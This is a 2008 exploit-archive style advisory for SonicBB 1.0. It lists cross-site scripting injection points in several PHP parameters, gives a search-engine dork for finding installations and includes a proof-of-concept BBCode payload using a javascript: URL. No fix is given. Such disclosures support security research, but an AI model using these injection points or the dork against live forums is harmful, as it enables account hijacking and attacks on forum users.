SonicBB 1.0 Multiple Cross Site Scripting Issues

`+----------------------------------------------------------------------+  
| |  
| SonicBB <= 1.0 Multiple XSS Vulnerabilities |  
| Revisited by Xylitol |  
| http://xylilabs.free.fr |  
| |  
+----------------------------------------------------------------------+  
  
  
AUTHOR : Xylitol  
DATE : 23 Dec 2008  
WEBSiTE : xylilabs.free.fr  
CONTACT : Check my site  
  
########################################################################  
  
APPLiCATiON : Sonic Bulletin Board  
DEMO : http://www.iscripts.com/sonicbb/demo/  
DOWNLOAD : http://www.iscripts.com/productlistingdetail.php?productid=10  
WEBSiTE : http://www.iscripts.com  
  
########################################################################  
  
  
[+] vulns & Exploits :  
  
lame dork : « Powered by iScripts SonicBB »  
  
  
####[MEDIUMS XSS]####  
viewforum.php: id=1[XSS]  
search.php: query=[XSS]  
Admin.php: bdo=set&user=[XSS]&rank=1  
post.php: id=257&do=edit&p=1[XSS]  
  
####[CRITICALS XSS]####  
usercp.php:  
aim=[XSS]&msn=[XSS]&yim=[XSS]&icq=[XSS]  
  
usercp.php:  
fname=[XSS]&lname=[XSS]  
  
post.php:  
title=Re%3A+Support+Requests&post=[XSS]  
  
Message PoC:  
[url=javascript:alert('XSS');]click me[/url]  
  
  
  
  
[+] Solution :  
  
n/a  
  
  
  
  
[~] Greetings :  
  
Stack, Sheiry, PHPLizardo, Xonzai, KPCR, Sh0ck, meloulisi, Tr00ps, v00d00chile, Uber0n, Langy, code91, t0fx  
xssing, sla.ckers and security-sh3ll ppl, and you !`